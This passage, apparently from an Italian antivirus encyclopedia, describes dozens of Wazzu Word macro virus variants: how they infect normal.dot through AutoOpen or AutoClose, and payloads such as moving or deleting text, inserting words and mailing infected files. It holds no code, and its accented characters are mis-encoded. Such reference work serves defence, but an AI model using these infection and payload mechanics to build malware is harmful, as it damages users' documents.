delle Macro: AutoOpen Lunghezza della Macro: 557 Byte Paese di origine: USA Data di origine: Febbraio 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AH ha qualche codice modificato. La prima procedura inserisce la parola "YaHoo" invece di "wazzu". La seconda procedura, che sposta delle parole da un posto ad un altro, Φ simile a Wazzu.A. Wazzu.AH infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). [Word_Wazzu.AI] Nome del virus: Word.Wazzu.AI Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 794 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AI Φ un altro virus da con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AJ] Nome del virus: Word.Wazzu.AJ Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 430 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AJ Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AK] Nome del virus: Word.Wazzu.AK Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: autoOpen Lunghezza della Macro: 344 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AK Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AL] Nome del virus: Word.Wazzu.AL Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 643 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AL ha qualche codice modificato. Infetta il modello di documento principale quando un documento infetto viene aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). La procedura Φ simile a quella di Wazzu. Per ulteriori informazioni, vedere la descrizione del virus Wazzu.A. [Word_Wazzu.AM] Nome del virus: Word.Wazzu.AM Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 606 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AM ha il codice leggermente modificato. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). La procedura Φ simile all'originale virus Wazzu. Ci sono 3 possibilitα su 5 che una parola, nel documento attivo, sia spostata. [Word_Wazzu.AN] Nome del virus: Word.Wazzu.AN Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 375 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AN Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). Inoltre contiene nel proprio codice il seguente commento: " REM This macro wipes out the Wazzu Virus! " [Word_Wazzu.AO] Nome del virus: Word.Wazzu.AO Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 626 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed il precedente Wazzu Φ che Wazzu.AO ha il codice leggermente modificato. Infetta il modello di documento principale quando un documento infetto viene aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). La procedura Φ simile a quella originale di Wazzu. Per ulteriori informazioni, vedere la descrizione di Wazzu.A. [Word_Wazzu.AP] Nome del virus: Word.Wazzu.AP Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: autoOpen Lunghezza della Macro: 432 Byte Paese di origine: USA Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AP Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AQ] Nome del virus: Word.Wazzu.AQ Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 437 Byte Paese di origine: USA Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AQ Φ un altro virus da macro con una procedura alterata e con alcuni comandi persi. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AR] Nome del virus: Word.Wazzu.AR Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 563 Byte Paese di origine: Germania Data di origine: Febbraio 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed il precedente Wazzu Φ che Wazzu.AR ha il codice leggermente modificato. Infetta il modello di documento principale quando un documento infetto viene aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). La procedura Φ simile a quella originale di Wazzu. Per ulteriori informazioni, vedere la descrizione di Wazzu.A. [Word_Wazzu.AS] Nome del virus: Word.Wazzu.AS Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 352 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed il precedente Wazzu Φ che Wazzu.AS ha i codici leggermente modificati. Infetta il modello di documento principale quando un documento infetto viene aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). Quando un utente apre un documento, Wazzu.AS aggiunge il seguente testo alla fine dei documenti: " ladderwork! " [Word_Wazzu.AT] Nome del virus: Word.Wazzu.AT Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 576 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AT ha il codice leggermente modificato. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). La procedura Φ simile all'originale virus Wazzu. Ci sono 3 possibilitα su 5 che una parola, nel documento attivo, sia spostata. [Word_Wazzu.AU] Nome del virus: Word.Wazzu.AU Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 630 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AU ha il codice leggermente modificato. Infetta il modello di documento principale quando un documento infetto viene aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). La procedura Φ simile a quella originale di Wazzu. Per ulteriori informazioni, vedere la descrizione di Wazzu.A. [Word_Wazzu.AV] Nome del virus: Word.Wazzu.AV Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 321 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AP Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AW] Nome del virus: Word.Wazzu.AW Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 1135 Byte Paese di origine: USA Data di origine: Febbraio 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AW Φ una combinazione tra il virus Wazzu ed il virus ShareFun. Contiene le procedure di entrambi i virus. Wazzu.AW sposta le parole da un posto all'altro, Inserisce la parola "wazzu" nel documento attivo, e cerca di spedire il documento infetto (C:\doc1.doc) a tre indirizzi scelti a caso dalla rubrica di MS Mail. Per altri dettagli, vedere la descrizione del virus Wazzu.A e Sharefun.A. [Word_Wazzu.AX] Nome del virus: Word.Wazzu.AX Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 343 Byte Paese di origine: USA Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AX Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AY] Nome del virus: Word.Wazzu.AY Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 632 Byte Paese di origine: Sconosciuto Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AY Φ un altro virus da macro con una procedura alterata e 2-byte del codice modificati. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.AZ] Nome del virus: Word.Wazzu.AZ Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoClose Lunghezza della Macro: 659 Byte Paese di origine: USA Data di origine: Febbraio 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.AZ ha il codice modificato. La propria procedura inserisce la parola "uzzaw" (wazzu al contrario). Wazzu.AZ usa anche la macro "AutoClose" invece di "AutoOpen". Infetta il modello di documento principale quando Φ chiuso un file infetto. Altri documenti divengono infetti quando vengono chiusi (AutoClose). [Word_Wazzu.B] Nome del virus: Word.Wazzu.B Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 697 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione e l'originale virus Wazzu.A Φ che Wazzu.B ha un commento aggiunto, ma di nessuna importanza. Per ulteriori informazioni, vedere la descrizione di Wazzu.A. [Word_Wazzu.BA] Nome del virus: Word.Wazzu.BA Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoClose Lunghezza della Macro: 277 Byte Paese di origine: USA Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BA ha il codice leggermente modificato e non ha nessuna procedura. Usa anche la macro "AutoClose" invece di "AutoOpen". Infetta il modello di documento principale quando Φ chiuso un file infetto. Altri documenti divengono infetti quando vengono chiusi (AutoClose). [Word_Wazzu.BB] Nome del virus: Word.Wazzu.BB Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 434 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BB Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.BC] Nome del virus: Word.Wazzu.BC Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 862 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BC punta un programma anti-virus con la propria procedura. Rinomina le cartelle di default di VET (prodotto australiano). Wazzu.BC contiene anche altre procedure per spostare le parole ed aggiungere i seguenti vocaboli ai nuovi documenti aperti: (probabilmente diverse in ogni caso) " waffle " " zoom " " kill " " mum " Wazzu.BC infetta il modello di documento principale quando un documento infetto Φ aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). [Word_Wazzu.BD] Nome del virus: Word.Wazzu.BD Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 525 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BD seleziona tutto il testo di un nuovo documento aperto e lo cancella. E' impossibile il recupero perchΘ Wazzu.BD ha eliminato anche il men∙ EDIT|EDITUNDO. C'Φ una probabilitα su cinquanta che questa procedura si attivi. Wazzu.BD mostra anche il seguente messaggio: " Where do you want to go today " Wazzu.BD infetta il modello di documento principale quando un viene aperto un documento infetto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). [Word_Wazzu.BE] Nome del virus: Word.Wazzu.BE Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 439 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BE mostra il seguente messaggio durante l'infezione: " Wazzu n'est pas mort " Wazzu.BE infetta il modello di documento principale quando un documento infetto viene aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). [Word_Wazzu.BF] Nome del virus: Word.Wazzu.BF Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 334 Byte Paese di origine: USA Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BF Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.BG] Nome del virus: Word.Wazzu.BG Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 432 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BG Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.BH] Nome del virus: Word.Wazzu.BH Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 472 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Payload: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti Virus Wazzu Φ che Wazzu.BH cerca di rimuovere tutto il testo dai nuovi documenti aperti. Non annulla l'opzione "Edit|Undo" , in questo modo gli utenti possono recuperare quanto scomparso.. Infetta il modello di documento principale quando Φ aperto un documento infetto. Altri documenti divengono quando vengono aperti (AutoOpen). [Word_Wazzu.BI] Nome del virus: Word.Wazzu.BI Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 361 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BI Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.BJ] Nome del virus: Word.Wazzu.BJ Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 299 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BJ Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.BK] Nome del virus: Word.Wazzu.BK Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 623 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed il precedente Wazzu Φ che Wazzu.BK ha il codice leggermente modificato. Infetta il modello di documento principale quando un documento infetto viene aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). La procedura Φ simile a quella originale di Wazzu. Per ulteriori informazioni, vedere la descrizione di Wazzu.A. [Word_Wazzu.BL] Nome del virus: Word.Wazzu.BL Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 678 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BL ha il codice leggermente modificato. Infetta il modello di documento principale quando viene aperto un documento infetto. Dopo aver infettato il modello di documento principale, non riesce ad infettare altri documenti. Quindi non Φ in grado di sopravvivere in the wild. [Word_Wazzu.BM] Nome del virus: Word.Wazzu.BM Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 296 Byte Paese di origine: USA Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BM Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.BN] Nome del virus: Word.Wazzu.BN Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 433 Byte Paese di origine: Germania Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BN Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.BO] Nome del virus: Word.Wazzu.BO Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 632 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BO ha il codice leggermente modificato. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). La procedura Φ simile all'originale virus Wazzu. Ci sono 3 possibilitα su 5 che una parola, nel documento attivo, sia spostata. [Word_Wazzu.BP] Nome del virus: Word.Wazzu.BP Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 289 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BP mostra il seguente messaggio: " Leaving Traces of Wazzu Around the World... " Wazzu.BP infetta il modello di documento principale quando un documento infetto viene aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). [Word_Wazzu.BQ] Nome del virus: Word.Wazzu.BQ Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 670 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed il precedente Wazzu Φ che Wazzu.BQ ha il codice leggermente modificato. Infetta il modello di documento principale quando un documento infetto viene aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). La procedura Φ simile a quella originale di Wazzu. Per ulteriori informazioni, vedere la descrizione di Wazzu.A. [Word_Wazzu.BR] Nome del virus: Word.Wazzu.BR Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 332 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BR Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.BS] Nome del virus: Word.Wazzu.BS Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 605 Byte Paese di origine: Francia Data di origine: Primavera 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BS sostituisce la parola "donc" con quanto segue: " Mon prof est con, " Questo succede quando viene aperto un documento (probabilitα: 3/4). La seconda procedura Φ simile a Wazzu.A, quando una parola Φ spostata da un posto ad un altro. Per maggiori dettagli, vedere la descrizione di Wazzu.A virus. Wazzu.BS infetta il modello di documento principale quando un documento infetto Φ aperto. Altri documenti divengono infetti quando vengono aperti (AutoOpen). [Word_Wazzu.BU] Nome del virus: Word.Wazzu.BU Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 148 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BU Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.BV] Nome del virus: Word.Wazzu.BV Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 152 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BV Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.BW] Nome del virus: Word.Wazzu.BW Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 158 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BW Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.BX] Nome del virus: Word.Wazzu.BX Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 345 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BX Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.BY] Nome del virus: Word.Wazzu.BY Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 277 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.BY Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.C] Nome del virus: Word.Wazzu.C Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: autoOpen Lunghezza della Macro: 433 Byte Paese di origine: Sconosciuto Data di origine: Estate 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: La differenza tra questa nuova versione e l'originale Wazzu.A Φ che Wazzu.C non ha nessuna procedura distruttiva. Si limita ad infettare. Durante la primavera del 1997, Wazzu.C fu scoperto in documenti di Word97 (Word8). [Word_Wazzu.CB] Nome del virus: Word.Wazzu.CB Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 343 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.CB Φ un altro virus da macro con alcuni codici modificati e nessuna procedura. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). [Word_Wazzu.D] Nome del virus: Word.Wazzu.D Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 331 Byte Paese di origine: Sconosciuto Data di origine: Estate 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione e Wazzu.C Φ che alcuni codici non usati sono persi in Wazzu.D. La differenza con l'originale Wazzu Φ che non contiene nessuna procedura distruttiva, come modificare i documenti. Wazzu.D infetta solamente. [Word_Wazzu.E] Nome del virus: Word.Wazzu.E Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 318 Byte Paese di origine: Sconosciuto Data di origine: Settembre 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: La differenza tra questa nuova versione e Wazzu.D Φ che alcuni codici non usati sono persi in Wazzu.E. La differenza con l'originale Wazzu Φ che non contiene nessuna procedura distruttiva, come modificare i documenti. Wazzu.E infetta solamente. [Word_Wazzu.F] Nome del virus: Word.Wazzu.F Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 450 Byte Paese di origine: Sconosciuto Data di origine: Settembre 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: Wazzu.F Φ una variante trascurabile di Wazzu.C con due differenze. Wazzu.F mostra un messaggio con una probabilitα su dieci ed il suo codice Φ criptato. La differenza con l'originale Wazzu Φ che non contiene nessuna procedura distruttiva, come modificare i documenti. Wazzu.F infetta solamente. Il seguente messaggio Φ mostrato con una probabilitα su dieci: " This one's for you, Bosco. " [Word_Wazzu.G] Nome del virus: Word.Wazzu.G Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: No Nomi delle Macro: AutoOpen Lunghezza della Macro: 632 Byte Paese di origine: Sconosciuto Data di origine: 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: La principale differenza tra questa nuova variante ed i precedenti virus Wazzu Φ che Wazzu.G ha il codice leggermente modificato. Infetta il modello di documento principale (normal.dot) quando un documento infetto Φ aperto. Altri documenti si infettano quando vengono aperti (AutoOpen). La procedura Φ simile all'originale virus Wazzu. Ci sono 3 possibilitα su 5 che una parola, nel documento attivo, sia spostata. [Word_Wazzu.H] Nome del virus: Word.Wazzu.H Tipo di Virus: Virus da macro di Word Numero di Macro: 1 Criptato: Si Nomi delle Macro: AutoOpen Lunghezza della Macro: 943 Byte Paese di 